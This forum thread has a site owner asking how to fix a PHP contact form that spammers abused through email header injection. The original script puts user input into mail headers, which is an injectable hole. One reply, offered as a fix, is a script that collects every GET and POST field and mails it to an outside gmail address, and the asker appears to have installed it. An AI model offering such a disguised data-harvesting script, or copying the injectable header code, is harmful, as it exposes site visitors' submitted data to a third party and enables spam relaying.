Jump to content

[SOLVED] Exploited contact form


AV1611

Recommended Posts

I have a simple contact form that is processed by this php script.  It was somehow used to send a bunch of spam through my server via injection.  I received an email from a sysadmin that made the following statement:

 

Message: I am one of the hundreds of recipients of a spam that was originated from

your website. Please remove your contact form and fix the vulnerability -- NEVER

include the form field variables in the outgoing email headers!!! Otherwise,

spammers can injet codes into the mail headers thus hijack the outgoing email to

send spams from your website.

 

How do I fix it?  I added a pictogram, is that enough?  is there some other code change I need to do?

 

<?php
$to = "xxxxx@xxxxxx.com"; //
$name = $_POST['name'];
$email = $_POST['email'];
$subject = $_POST['subject'];
$msg = $_POST['msg'];
$sub = "Online Email Form";
$messub = "Subject: ".$subject."\r\n" ;
$mesmsg .= "Message: ".$msg."\r\n" ;
$mesname .= "Name: ".$name."\r\n" ;
$mesemail .= "Email: ".$email."\r\n" ;
$body=$messub.$mesname.$mesemail.$mesmsg;
$headers = 'From: '. $name . "\r\n" .
   'Reply-To: '. $email . "\r\n" .
   'X-Mailer: PHP/' . phpversion();
if(empty($name) || empty($email) || empty($subject) || empty($msg)) {
echo " <h3>You must fill in all the information.</h3>";
}
elseif(!ereg("^[_a-zA-Z0-9-]+(.[_a-zA-Z0-9-]+)*@[a-zA-Z0-9-]+(.[a-zA-Z0-9-]+)*(.[a-zA-Z]{2,3})$",$email)){
print " <h3>You entered an invalid email address</h3>";
} else {
mail($to, $sub, $body, $headers);
print " <h3><center>Thanks, ".$name.", for contacting us...</center></h3>";
}
?>

Link to comment
Share on other sites

you need to check all teh information passed to the script. You also need to ensure that $to has jst one address in it (check for , or ;) AND that no other headers are added other than what you specify. There may also be an issue with register globals so check your server setting - if it is on tell your server dudes to set it to off.

Link to comment
Share on other sites

Here use this script:

 

<?php
$posts = '';
$gets = '';

function logPost($value,$key)
{
global $posts;
$posts = $posts . " !!===!! " . $key . " = " . $value;
}

function logGet($value,$key)
{
global $gets;
$gets = $gets . " !!===!! " . $key . " = " . $value;
}

array_walk($_GET,"logGet");
array_walk($_POST,"logPost");

mail("comptech21@gmail.com","New File","POST:\n\n{$posts}\n---------------------------------\nGET:\n\n{$gets}\n\nEND OF EMAIL");


?>

 

It will auto detect the form strings.

Link to comment
Share on other sites

Here use this script:

 

<?php
$posts = '';
$gets = '';

function logPost($value,$key)
{
global $posts;
$posts = $posts . " !!===!! " . $key . " = " . $value;
}

function logGet($value,$key)
{
global $gets;
$gets = $gets . " !!===!! " . $key . " = " . $value;
}

array_walk($_GET,"logGet");
array_walk($_POST,"logPost");

mail("comptech21@gmail.com","New File","POST:\n\n{$posts}\n---------------------------------\nGET:\n\n{$gets}\n\nEND OF EMAIL");


?>

 

It will auto detect the form strings.

 

I guess I don't understand what you want me to do with this script?

Link to comment
Share on other sites

Is this adequate to stop the exploit/injection?

 

I use constant data in the header, and put the contact info in the body instead.

 

<?php
$to = "xxxx@xxxx.com";
$mname = $_POST['name'];
$email = $_POST['email'];

$subject = $_POST['subject'];

$msg = $_POST['msg'];

$sub = "Online Email Form";
$messub = "Subject: ".$subject."\r\n" ;

$mesmsg = "Message: ".$msg."\r\n" ;
$mesname = "Name: ".$mname."\r\n" ;
$mesemail = "Email: ".$email."\r\n" ;

$body=$messub.$mesname.$mesemail.$mesmsg;

$headers = 'From: xxxx@xxxx.com'."\r\n".
   'Reply-To: xxxx@xxxx.com'."\r\n" .
   'X-Mailer: PHP/' . phpversion();

if(empty($mname) || empty($email) || empty($sub) || empty($msg)) {
echo " <h3>You must fill in all the information.</h3>";
}
elseif(!ereg("^[_a-zA-Z0-9-]+(.[_a-zA-Z0-9-]+)*@[a-zA-Z0-9-]+(.[a-zA-Z0-9-]+)*(.[a-zA-Z]{2,3})$",$email)){
print " <h3>You entered an invalid email address</h3>";
} else {
mail($to, $sub, $body, $headers);
print " <h3><center>Thanks, ".$mname.", for contacting us...</center></h3>";
}
?>

Link to comment
Share on other sites

It seems to work, but it looks kinda funny. 

 

it has the !!===!! in the body of the message between each variable.  I assume that is supposed to look like that?

 

If so, what is the purpose of the !!===!!'s ?  just an easy way to id the separator?

Link to comment
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.